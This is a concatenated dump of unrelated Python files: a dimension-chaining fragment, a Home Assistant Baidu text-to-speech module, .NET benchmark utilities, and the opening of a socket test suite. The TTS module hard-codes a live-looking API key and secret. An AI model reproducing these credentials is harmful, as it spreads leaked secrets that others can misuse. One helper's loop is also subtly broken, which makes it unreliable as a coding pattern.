chained_dimensions.append(join2[0])
def extract_all_joins_from_join_list(join_list):
all_joins_list = []
for lists in join_list:
all_joins_list += lists
return all_joins_list
def initialize_minofmaxes_and_maxofmins(chain):
first_dim = next(iter(chain), None)
max_of_mins = first_dim[0]
min_of_maxes = first_dim[1]
chain_size = len(chain)
cnt = 0
while (min_of_maxes is None or max_of_mins is None) and cnt < chain_size:
first_dim = next(iter(chain), None)
max_of_mins = first_dim[0]
min_of_maxes = first_dim[1]
cnt += 1
return max_of_mins, min_of_maxes
|
api_tts.py | import os, hashlib, asyncio, threading, time, aiohttp, json, urllib, mutagen
from mutagen.mp3 import MP3
from homeassistant.helpers.network import get_url
from homeassistant.helpers import template
from homeassistant.const import (STATE_PLAYING)
# 百度TTS
IS_PY3 = True
from urllib.request import urlopen
from urllib.request import Request
from urllib.error import URLError
from urllib.parse import urlencode
from urllib.parse import quote_plus
API_KEY = '4E1BG9lTnlSeIf1NQFlrSq6h'
SECRET_KEY = '544ca4657ba8002e3dea3ac2f5fdd241'
# 发音人选择, 基础音库:0为度小美,1为度小宇,3为度逍遥,4为度丫丫,
# 精品音库:5为度小娇,103为度米朵,106为度博文,110为度小童,111为度小萌,默认为度小美
PER = 4
# 语速,取值0-15,默认为5中语速
SPD = 5
# 音调,取值0-15,默认为5中语调
PIT = 5
# 音量,取值0-9,默认为5中音量
VOL = 5
# 下载的文件格式, 3:mp3(default) 4: pcm-16k 5: pcm-8k 6. wav
AUE = 3
FORMATS = {3: "mp3", 4: "pcm", 5: "pcm", 6: "wav"}
FORMAT = FORMATS[AUE]
CUID = "123456PYTHON"
TTS_URL = 'http://tsn.baidu.com/text2audio'
class DemoError(Exception):
pass
""" TOKEN start """
TOKEN_URL = 'http://openapi.baidu.com/oauth/2.0/token'
SCOPE = 'audio_tts_post' # 有此scope表示有tts能力,没有请在网页里勾选
def fetch_token():
print("fetch token begin")
params = {'grant_type': 'client_credentials',
'client_id': API_KEY,
'client_secret': SECRET_KEY}
post_data = urlencode(params)
if (IS_PY3):
post_data = post_data.encode('utf-8')
req = Request(TOKEN_URL, post_data)
try:
f = urlopen(req, timeout=5)
result_str = f.read()
except URLError as err:
print('token http response http code : ' + str(err.code))
result_str = err.read()
if (IS_PY3):
result_str = result_str.decode()
print(result_str)
result = json.loads(result_str)
print(result)
if ('access_token' in result.keys() and 'scope' in result.keys()):
if not SCOPE in result['scope'].split(' '):
raise DemoError('scope is not correct')
print('SUCCESS WITH TOKEN: %s ; EXPIRES IN SECONDS: %s' % (result['access_token'], result['expires_in']))
return result['access_token']
else:
raise DemoError('MAYBE API_KEY or SECRET_KEY not correct: access_token or scope not found in token response')
""" TOKEN end """
class ApiTTS():
def __init__(self, media, cfg):
self.hass = media._hass
self.media = media
self.media_position = None
self.media_url = None
self.thread = None
self.tts_before_message = cfg['tts_before_message']
self.tts_after_message = cfg['tts_after_message']
tts_mode = cfg['tts_mode']
if [1, 2, 3, 4].count(tts_mode) == 0:
tts_mode = 4
tts_volume = 0
tts_config = media.api_config.get_tts()
if tts_config is not None:
tts_mode = tts_config.get('mode', 4)
tts_volume = tts_config.get('volume', 0)
# TTS声音模式
self.tts_mode = tts_mode
# TTS音量
self.tts_volume = tts_volume
def log(self, name,value):
self.media.log('【文本转语音】%s:%s',name,value)
# 异步进行TTS逻辑
def async_tts(self, text):
# 如果当前正在播放,则暂停当前播放,保存当前播放进度
if self.media._media_player != None and self.media.state == STATE_PLAYING:
self.media.media_pause()
self.media_position = self.media.media_position
self.media_url = self.media.media_url
# 播放当前文字内容
self.play_url(text)
# 恢复当前播放到保存的进度
if self.media_url is not None:
self.log('恢复当前播放URL', self.media_url)
#self.media._media_player.load(self.media_url)
#time.sleep(2)
self.log('恢复当前进度', self.media_position)
#self.media._media_player.seek(self.media_position)
#self.media._media_player.play()
self.media._media_player.reloadURL(self.media_url, self.media_position)
self.media_url = None
# 获取语音URL
def play_url(self, text):
# 如果传入的是链接
if text.find('voice-') == 0:
f_name = text
else:
# 生成文件名
f_name = 'tts-' + self.media.api_config.md5(text + str(self.tts_mode)) + ".mp3"
# 创建目录名称
_dir = self.hass.config.path("tts")
self.media.api_config.mkdir(_dir)
# 生成缓存文件名称
ob_name = _dir + '/' + f_name
self.log('本地文件路径', ob_name)
# 文件不存在,则获取下载
if os.path.isfile(ob_name) == False:
token = fetch_token()
tex = quote_plus(text) # 此处TEXT需要两次urlencode
print(tex)
per = [1,0,3,4][self.tts_mode - 1]
params = {'tok': token, 'tex': tex, 'per': per, 'spd': SPD, 'pit': PIT, 'vol': VOL, 'aue': AUE, 'cuid': CUID,
'lan': 'zh', 'ctp': 1} # lan ctp 固定参数
data = urlencode(params)
urllib.request.urlretrieve(TTS_URL + '?' + data, ob_name)
# 修改MP3文件属性
meta = mutagen.File(ob_name, easy=True)
meta['title'] = text
meta.save()
else:
# 如果没有下载,则延时1秒
time.sleep(1)
# 生成播放地址
local_url = get_url(self.hass).strip('/') + '/tts-local/' + f_name
self.log('本地URL', local_url)
if self.media._media_player != None:
self.media._media_player.is_tts = True
# 保存当前音量
volume_level = self.media.volume_level
# 如果设置的TTS音量不为0,则改变音量
if self.tts_volume > 0:
print('设置TTS音量:%s'%(self.tts_volume))
self.media._media_player.set_volume_level(self.tts_volume / 100)
# 保存播放速度
rate = self.media._media_player.rate
# 播放TTS链接
self.media._media_player.load(local_url)
# 计算当前文件时长,设置超时播放时间
audio = MP3(ob_name)
self.log('音频时长', audio.info.length)
time.sleep(audio.info.length + 3)
self.media._media_player.is_tts = False
# 恢复播放速度
self.media._media_player.set_rate(rate)
# 恢复音量
print('恢复音量:%s'%(volume_level))
self.media._media_player.set_volume_level(volume_level)
async def speak(self, call):
try:
if isinstance(call, str):
text = call
else:
text = call.data.get('text', '')
if text == '':
# 解析模板
tpl = template.Template(call.data['message'], self.hass)
text = self.tts_before_message + tpl.async_render(None) + self.tts_after_message
self.log('解析后的内容', text)
if self.thread != None:
self.thread.join()
self.thread = threading.Thread(target=self.async_tts, args=(text,))
self.thread.start()
except Exception as ex:
self.log('出现异常', ex) |
util.py | # Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the MIT license.
# See the LICENSE file in the project root for more information.
from __future__ import annotations # Allow subscripting Popen
from dataclasses import dataclass, replace
from datetime import timedelta
from difflib import get_close_matches
from enum import Enum
from functools import reduce
from inspect import getfile
from math import ceil, floor, inf, isclose, isnan
from operator import mul
import os
from os import kill, name as os_name
from os.path import splitext
from pathlib import Path
from platform import node
from signal import signal, SIGINT
from subprocess import DEVNULL, PIPE, Popen, run
from stat import S_IREAD, S_IWRITE, S_IRUSR, S_IWUSR, S_IRGRP, S_IWGRP, S_IROTH, S_IWOTH
from statistics import median, StatisticsError
from sys import argv
from threading import Event, Thread
from time import sleep, time
from typing import Any, Callable, cast, Dict, Iterable, List, Mapping, Optional, Sequence, Union
from xml.etree.ElementTree import Element, parse as parse_xml
from psutil import process_iter
from result import Err, Ok, Result
from .collection_util import add, find, identity, is_empty, min_max_float
from .option import option_or
from .type_utils import check_cast, T, U, V, with_slots
def remove_str_start(s: str, start: str) -> str:
assert s.startswith(start), f"Expected {s} to start with {repr(start)}"
return s[len(start) :]
def remove_str_end(s: str, end: str) -> str:
assert s.endswith(end), f"Expected {s} to end with {end}"
return s[: -len(end)]
def remove_str_start_end(s: str, start: str, end: str) -> str:
return remove_str_end(remove_str_start(s, start), end)
def try_remove_str_start(s: str, start: str) -> Optional[str]:
return remove_str_start(s, start) if s.startswith(start) else None
def try_remove_str_end(s: str, end: str) -> Optional[str]:
return remove_str_end(s, end) if s.endswith(end) else None
def remove_char(s: str, char: str) -> str:
return s.translate(str.maketrans("", "", char))
def ensure_empty_dir(dir_path: Path) -> None:
ensure_dir(dir_path)
clear_dir(dir_path)
def unlink_if_exists(path: Path) -> None:
if path.exists():
path.unlink()
def clear_dir(dir_path: Path) -> None:
tries = 1
while tries > 0:
try:
# shutil.rmtree fails: github.com/hashdist/hashdist/issues/113#issuecomment-25374977
# TODO: avoid str(path)
for sub in dir_path.iterdir():
if not sub.is_dir():
sub.unlink()
for sub in dir_path.iterdir():
assert sub.is_dir()
clear_dir(sub)
sub.rmdir()
except OSError as e:
tries -= 1
if tries <= 0 or "The directory is not empty" not in e.strerror:
raise
sleep(1)
else:
break
def ensure_dir(dir_path: Path) -> None:
if not dir_path.exists():
assert dir_path.parent != dir_path
ensure_dir(dir_path.parent)
dir_path.mkdir()
def get_factor_diff(old: float, new: float) -> float:
if old == 0:
return 0 if new == 0 else inf if new > 0 else -inf
else:
return (new - old) / old
def get_max_factor_diff(values: Iterable[float]) -> Optional[float]:
mm = min_max_float(values)
return None if mm is None else get_factor_diff(*mm.to_pair())
def product(values: Sequence[float]) -> float:
return reduce(mul, values)
def geometric_mean(values: Sequence[float]) -> float:
# Geometric mean only works for positive values
assert all(v > 0 for v in values)
# 'pow' returns 'Any', this has caused me problems in the past
return check_cast(float, pow(product(values), 1.0 / len(values)))
def assert_is_percent(p: float) -> float:
return 0 <= p <= 100
def get_percent(f: float) -> float:
return f * 100
def percent_to_fraction(p: float) -> float:
return p / 100
def float_to_str(f: float) -> str:
if f == 0:
return "0"
elif isnan(f):
return "NaN"
else:
def get_fmt() -> str:
a = abs(f)
if 0.001 <= a < 10000:
if a < 0.01:
return "%.5f"
elif a < 0.1:
return "%.4f"
elif a < 1:
return "%.3f"
elif a < 10:
return "%.2f"
elif a < 100:
return "%.1f"
else:
return "%.0f"
else:
return "%.2e"
res = get_fmt() % f
assert isclose(float(res), f, rel_tol=5e-3)
return res
def float_to_str_smaller(f: float) -> str:
if f == 0:
return "0"
elif isnan(f):
return "NaN"
else:
def get_fmt() -> str:
a = abs(f)
if 0.01 <= a < 1000:
if a < 0.1:
return "%.3f"
elif a < 1:
return "%.2f"
elif a < 10:
return "%.1f"
else:
return "%.0f"
else:
return "%.1e"
res = get_fmt() % f
assert isclose(float(res), f, rel_tol=5e-2)
return res
def _assert_exists(path: Path) -> Path:
assert path.exists(), f"Could not find {path}"
return path
def assert_file_exists(path: Path) -> Path:
_assert_exists(path)
assert path.is_file(), f"{path} is not a file"
return path
def assert_dir_exists(path: Path) -> Path:
_assert_exists(path)
assert path.is_dir(), f"{path} is not a directory"
return path
def make_absolute_path(path: Path) -> Path:
if path.is_absolute():
return path
else:
return Path.cwd() / path
def get_existing_absolute_path(path: object, message: Optional[Callable[[], str]] = None) -> Path:
assert isinstance(path, str)
p = Path(path)
assert p.is_absolute(), f"Path {path} should be absolute" if message is None else message()
return _assert_exists(p)
def get_existing_absolute_file_path(
path: object, message: Optional[Callable[[], str]] = None
) -> Path:
p = get_existing_absolute_path(path, message)
assert p.is_file(), f"Path {p} exists, but is not a file"
return p
def stdev_frac(stdv: float, avg: float) -> float:
if avg == 0.0:
return 0.0 if stdv == 0.0 else 1.0
else:
return stdv / avg
def os_is_windows() -> bool:
return {OS.posix: False, OS.windows: True}[get_os()]
class OS(Enum):
posix = 0
windows = 1
def get_os() -> OS:
return {"nt": OS.windows, "posix": OS.posix}[os_name]
@with_slots
@dataclass(frozen=True)
class ExecArgs:
cmd: Sequence[str]
cwd: Optional[Path] = None
env: Optional[Mapping[str, str]] = None
# Don't print the command before running
quiet_print: bool = False
# Ignore print to stdout
quiet_stdout: bool = False
# Ignore print to stderr
quiet_stderr: bool = False
def print(self) -> None:
if not self.quiet_print:
print(self)
def __str__(self) -> str:
s = " ".join(self.cmd)
if self.cwd is not None:
s += f" (cwd {self.cwd})"
# printing env is too verbose
return s
def args_with_cmd(a: ExecArgs, cmd: Sequence[str]) -> ExecArgs:
# Note: replace is not type-safe, so putting this near the definition of cmd
return replace(a, cmd=cmd)
AnyPopen = Union["Popen[str]", "Popen[bytes]"]
def is_process_alive(process: AnyPopen) -> bool:
return process.poll() is None
class ExecError(Exception):
pass
def _call_and_allow_interrupts(args: ExecArgs) -> timedelta:
start_time_seconds = time()
process = Popen(
args.cmd,
cwd=args.cwd,
env=args.env,
stdout=DEVNULL if args.quiet_stdout else None,
stderr=DEVNULL if args.quiet_stderr else None,
)
def handler(sig: int, _: Any) -> None: # TODO: `_: FrameType`
process.send_signal(sig)
raise KeyboardInterrupt
signal(SIGINT, handler)
exit_code = process.wait()
if exit_code != 0:
quiet_warning = " (Try running without 'quiet_stderr')" if args.quiet_stderr else ""
raise ExecError(f"Process {args.cmd} failed with exit code {exit_code}{quiet_warning}")
return timedelta(seconds=time() - start_time_seconds)
def exec_cmd(args: ExecArgs) -> timedelta:
args.print()
return _call_and_allow_interrupts(args)
@with_slots
@dataclass(frozen=True)
class BenchmarkRunErrorInfo:
name: str
iteration_num: int
message: str
trace: List[str]
def print(self) -> None:
print(
f"- Benchmark: '{self.name}' -\n"
f"Iteration: {self.iteration_num}\n"
f"Error Message: {self.message}\n"
f"\nStack Trace:\n{self.__rebuild_trace()}\n"
)
def __rebuild_trace(self) -> str:
return "".join(self.trace)
@with_slots
@dataclass(frozen=True)
class ConfigRunErrorInfo:
name: str
benchmarks_run: BenchmarkErrorList
def print(self) -> None:
print(f"=== Configuration '{self.name}' ===\n")
for bench in self.benchmarks_run:
bench.print()
def add_benchmark(self, new_bench: BenchmarkRunErrorInfo) -> None:
self.benchmarks_run.append(new_bench)
@with_slots
@dataclass(frozen=True)
class CoreRunErrorInfo:
name: str
configs_run: ConfigurationErrorMap
def print(self) -> None:
print(f"===== Core '{self.name}' =====\n")
for config in self.configs_run.values():
config.print()
def add_config(self, new_config: ConfigRunErrorInfo) -> None:
add(self.configs_run, new_config.name, new_config)
@with_slots
@dataclass(frozen=True)
class ExecutableRunErrorInfo:
name: str
coreclrs_run: CoreErrorMap
def print(self) -> None:
print(f"======= Executable '{self.name}' =======\n")
for coreclr in self.coreclrs_run.values():
coreclr.print()
def add_coreclr(self, new_coreclr: CoreRunErrorInfo) -> None:
add(self.coreclrs_run, new_coreclr.name, new_coreclr)
RunErrorMap = Dict[str, ExecutableRunErrorInfo]
CoreErrorMap = Dict[str, CoreRunErrorInfo]
ConfigurationErrorMap = Dict[str, ConfigRunErrorInfo]
BenchmarkErrorList = List[BenchmarkRunErrorInfo]
def add_new_error(
run_errors: RunErrorMap,
exec_name: str,
core_name: str,
config_name: str,
bench_name: str,
iteration_num: int,
message: str,
trace: List[str],
) -> None:
if exec_name not in run_errors:
bench_list = [BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)]
config_dict = {config_name: ConfigRunErrorInfo(config_name, bench_list)}
coreclr_dict = {core_name: CoreRunErrorInfo(core_name, config_dict)}
add(run_errors, exec_name, ExecutableRunErrorInfo(exec_name, coreclr_dict))
else:
exec_info = run_errors[exec_name]
if core_name not in exec_info.coreclrs_run:
bench_list = [BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)]
config_dict = {config_name: ConfigRunErrorInfo(config_name, bench_list)}
exec_info.add_coreclr(CoreRunErrorInfo(core_name, config_dict))
else:
core_info = exec_info.coreclrs_run[core_name]
if config_name not in core_info.configs_run:
bench_list = [BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)]
core_info.add_config(ConfigRunErrorInfo(config_name, bench_list))
else:
config_info = core_info.configs_run[config_name]
config_info.add_benchmark(
BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)
)
@with_slots
@dataclass(frozen=True)
class WaitOnProcessResult:
stdout: str
# None if timed out
time_taken: Optional[timedelta]
def exec_start(args: ExecArgs, pipe_stdout: bool, pipe_stdin: bool = False) -> Popen[str]:
args.print()
assert not (args.quiet_stdout and pipe_stdout)
return Popen(
args.cmd,
env=args.env,
cwd=None if args.cwd is None else str(args.cwd),
stdin=PIPE if pipe_stdin else None,
stdout=DEVNULL if args.quiet_stdout else PIPE if pipe_stdout else None,
text=True,
)
def wait_on_process_with_timeout(
process: Popen[str], start_time_seconds: float, timeout_seconds: float
) -> WaitOnProcessResult:
assert is_process_alive(process)
done = Event()
killed = False
def process_kill_function() -> None:
nonlocal killed
is_done = done.wait(timeout=timeout_seconds)
if not is_done and is_process_alive(process):
print(f"Process timed out after {timeout_seconds} seconds! Sending SIGINT")
# process.send_signal(SIGINT) # This causes ValueError: Unsupported signal: 2
kill_process(process, time_allowed_seconds=1)
killed = True
process_killer = Thread(target=process_kill_function)
process_killer.start()
stdout, stderr = process.communicate()
assert stderr is None
returncode = process.wait()
end_time_seconds = time()
# If the process exited normally early, process_kill_function can exit.
# (If it was killed, this will have no effect)
done.set()
process_killer.join()
assert returncode == process.returncode
assert killed or process.returncode == 0, f"Process failed with code {process.returncode}"
return WaitOnProcessResult(
stdout=stdout,
time_taken=None if killed else timedelta(seconds=(end_time_seconds - start_time_seconds)),
)
def kill_process(process: AnyPopen, time_allowed_seconds: float) -> None:
assert is_process_alive(process)
kill(process.pid, SIGINT)
start_time_seconds = time()
while is_process_alive(process):
sleep(1)
if (time() - start_time_seconds) > time_allowed_seconds:
print(
f"Process '{check_cast(str, process.args)}' refused to shut down normally. "
+ "Trying again without asking nicely."
)
process.kill()
break
assert not is_process_alive(process)
class ExecutableNotFoundException(Exception):
def __init__(self, path: Path):
self.path = path
super().__init__(f"Cannot find {path}")
@with_slots
@dataclass(frozen=True)
class OutputAndExitCode:
stdout: str
exit_code: int
def exec_and_get_output_and_exit_code(args: ExecArgs) -> OutputAndExitCode:
args.print()
# These arguments don't apply here, should have their default values
assert args.quiet_stdout is False and args.quiet_stderr is False
try:
r = run(args.cmd, stdout=PIPE, cwd=args.cwd, env=args.env, check=False)
except FileNotFoundError:
raise ExecutableNotFoundException(Path(args.cmd[0])) from None
except NotADirectoryError:
raise Exception(f"Invalid cwd: {args.cwd}") from None
return OutputAndExitCode(decode_stdout(r.stdout), r.returncode)
def exec_and_get_output(args: ExecArgs, expect_exit_code: Optional[int] = None) -> str:
expected_exit_code = option_or(expect_exit_code, 0)
res = exec_and_get_output_and_exit_code(args)
assert (
res.exit_code == expected_exit_code
), f"Returned with code {res.exit_code}, expected {expected_exit_code}"
return res.stdout
@with_slots
@dataclass(frozen=True)
class ProcessResult:
exit_code: int
stdout: str
stderr: str
def exec_and_get_result(args: ExecArgs) -> ProcessResult:
args.print()
# These arguments don't apply here, should have their default values
assert args.quiet_stdout is False and args.quiet_stderr is False
try:
r = run(args.cmd, stdout=PIPE, stderr=PIPE, cwd=args.cwd, env=args.env, check=False)
except FileNotFoundError:
raise Exception(f"Cannot find {args.cmd[0]}") from None
return ProcessResult(
exit_code=r.returncode, stdout=decode_stdout(r.stdout), stderr=decode_stdout(r.stderr)
)
def decode_stdout(stdout: bytes) -> str:
# Microsoft trademark confuses python
stdout = stdout.replace(b"\xae", b"")
return stdout.decode("utf-8").strip().replace("\r", "")
def exec_and_expect_output(args: ExecArgs, expected_output: str, err: str) -> None:
output = exec_and_get_output(args)
if output != expected_output:
print("actual:", repr(output))
print("expect:", repr(expected_output))
raise Exception(err)
_BYTES_PER_KB: int = 2 ** 10
_BYTES_PER_MB: int = 2 ** 20
_BYTES_PER_GB: int = 2 ** 30
def bytes_to_kb(n_bytes: Union[int, float]) -> float:
return n_bytes / _BYTES_PER_KB
def bytes_to_mb(n_bytes: Union[int, float]) -> float:
return n_bytes / _BYTES_PER_MB
def bytes_to_gb(n_bytes: Union[int, float]) -> float:
return n_bytes / _BYTES_PER_GB
def kb_to_bytes(kb: float) -> int:
return round(kb * _BYTES_PER_KB)
def mb_to_bytes(mb: float) -> int:
return round(mb * _BYTES_PER_MB)
def gb_to_bytes(gb: float) -> int:
return round(gb * _BYTES_PER_GB)
def kb_to_mb(kb: float) -> float:
return bytes_to_mb(kb_to_bytes(kb))
def mb_to_gb(mb: float) -> float:
return bytes_to_gb(mb_to_bytes(mb))
def gb_to_mb(gb: float) -> float:
return bytes_to_mb(gb_to_bytes(gb))
MSECS_PER_SECOND = 1000
USECS_PER_SECOND = 1_000_000
def show_size_bytes(n_bytes: float) -> str:
return show_in_units(
n_bytes,
(Unit(_BYTES_PER_GB, "GB"), Unit(_BYTES_PER_MB, "MB"), Unit(_BYTES_PER_KB, "KB")),
Unit(1, "bytes"),
)
@with_slots
@dataclass(frozen=True)
class Unit:
amount: float
name: str
def show_in_units(amount: float, units: Sequence[Unit], base_unit: Unit) -> str:
# Find a unit where this is >= 1 of it
unit = option_or(find(lambda u: abs(amount) >= u.amount, units), base_unit)
amount_in_units = (
str(amount) if unit.amount == 1 and amount % 1 == 0 else "%.2f" % (amount / unit.amount)
)
return amount_in_units + f" {unit.name}"
def seconds_to_msec(seconds: float) -> float:
return seconds * MSECS_PER_SECOND
def seconds_to_usec(seconds: float) -> float:
return seconds * USECS_PER_SECOND
def msec_to_seconds(msec: float) -> float:
return msec / MSECS_PER_SECOND
def mhz_to_ghz(mhz: float) -> float:
return mhz / 1000
# Python's os.walk won't work, because it takes Strings and not paths.
# Unfortunately `Path(str(path))` isn't the identity if path is `//machine/`. (Python bug?)
def walk_files_recursive(path: Path, filter_dir: Callable[[Path], bool]) -> Iterable[Path]:
for sub in path.iterdir():
if sub.is_dir():
if filter_dir(sub):
for x in walk_files_recursive(sub, filter_dir):
yield x
else:
yield sub
def get_hostname() -> str:
return node()
# TODO:MOVE
def assert_admin() -> None:
if not is_admin():
raise Exception(
"PerfView requires you to be an administrator"
if os_is_windows()
else "cgcreate requires you to be a super user"
)
def is_admin() -> bool:
if os_is_windows():
# Do this import lazily as it is only available on Windows
from win32com.shell.shell import IsUserAnAdmin # pylint:disable=import-outside-toplevel
return IsUserAnAdmin()
else:
# Importing it this way since geteuid doesn't exist in windows and mypy complains there
geteuid = cast(Callable[[], int], getattr(os, "geteuid"))
return geteuid() == 0
def get_extension(path: Path) -> str:
return splitext(path.name)[1]
def add_extension(p: Path, ext: str) -> Path:
return p.parent / f"{p.name}.{ext}"
def remove_extension(p: Path) -> Path:
return p.parent / splitext(p.name)[0]
def change_extension(p: Path, ext: str) -> Path:
return add_extension(remove_extension(p), ext)
def get_or_did_you_mean(mapping: Mapping[str, V], key: str, name: str) -> V:
try:
return mapping[key]
except KeyError:
raise Exception(did_you_mean(tuple(mapping.keys()), key, name)) from None
def did_you_mean(
choices: Iterable[str], choice: str, name: str, show_choice: Callable[[str], str] = identity
) -> str:
assert choice not in choices
# Mypy has the return type of get_close_matches wrong?
close = check_cast(Sequence[str], get_close_matches(choice, choices)) # type: ignore
if is_empty(close):
choices = tuple(choices)
if len(choices) < 20:
return f"Bad {name} {show_choice(choice)}. Available: {tuple(choices)}"
else:
return f"Bad {name} {show_choice(choice)}."
elif len(close) == 1:
return f"Bad {name} {show_choice(choice)}. Did you mean {show_choice(close[0])}?"
else:
close_str = "\n".join(tuple(show_choice(c) for c in close))
return f"Bad {name} {show_choice(choice)}. Did you mean one of:\n{close_str}"
def hex_no_0x(i: int) -> str:
return remove_str_start(hex(i), "0x")
def try_parse_single_tag_from_xml_document(path: Path, tag_name: str) -> Optional[str]:
assert tag_name.startswith("{"), "Should start with schema"
root = parse_xml(str(path)).getroot()
tags = tuple(_iter_tag_recursive(root, tag_name))
if is_empty(tags):
return None
else:
assert len(tags) == 1 # Should only be specified once
tag = tags[0]
return tag.text
def _iter_tag_recursive(e: Element, tag_name: str) -> Iterable[Element]:
for child in e:
if child.tag == tag_name:
yield child
else:
yield from _iter_tag_recursive(child, tag_name)
# Note: WeakKeyDictionary does not seem to work on CLR types. So using this hack instead.
def lazy_property(obj: T, f: Callable[[T], U], name: Optional[str] = None) -> U:
if name is None:
# Mypy expects f to be a "FunctionType", but I don't know how to import that
name = f"{getfile(cast(Any, f))}/{f.__name__}"
res: Optional[U] = getattr(obj, name, None)
if res is None:
res = f(obj)
assert res is not None
setattr(obj, name, res)
return res
def opt_max(i: Iterable[float]) -> Optional[float]:
try:
return max(i)
except ValueError:
return None
def opt_median(i: Iterable[float]) -> Optional[float]:
try:
return median(i)
except StatisticsError:
return None
# numpy has problems on ARM, so using this instead.
def get_percentile(values: Sequence[float], percent: float) -> float:
assert not is_empty(values)
assert 0.0 <= percent <= 100.0
sorted_values = sorted(values)
fraction = percent / 100.0
index_and_fraction = (len(values) - 1) * fraction
prev_index = floor(index_and_fraction)
next_index = ceil(index_and_fraction)
# The closer we are to 'next_index', the more 'next' should matter
next_factor = index_and_fraction - prev_index
prev_factor = 1.0 - next_factor
return sorted_values[prev_index] * prev_factor + sorted_values[next_index] * next_factor
def get_95th_percentile(values: Sequence[float]) -> Result[str, float]:
return Err("<no values>") if is_empty(values) else Ok(get_percentile(values, 95))
def update_file(path: Path, text: str) -> None:
if (not path.exists()) or path.read_text(encoding="utf-8") != text:
print(f"Updating {path}")
path.write_text(text, encoding="utf-8")
# When we run a test with 'sudo', we need to make sure other users can access the file
def give_user_permissions(file: Path) -> None:
flags = S_IREAD | S_IWRITE | S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH
file.chmod(flags)
def check_no_processes(names: Sequence[str]) -> None:
assert all(name.islower() for name in names)
for proc in process_iter():
for name in names:
suggestion = {
OS.posix: f"pkill -f {name}",
OS.windows: f'Get-Process | Where-Object {{$_.Name -like "{name}"}} | Stop-Process',
}[get_os()]
assert name not in proc.name().lower(), (
f"'{name}' is already running\n" + f"Try: `{suggestion}`"
)
def get_command_line() -> str:
return f"> py {' '.join(argv)}"
|
test_socket.py | import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
if not hasattr(socket, 'IOCTL_VM_SOCKETS_GET_LOCAL_CID'):
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ip link set up vcan0
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
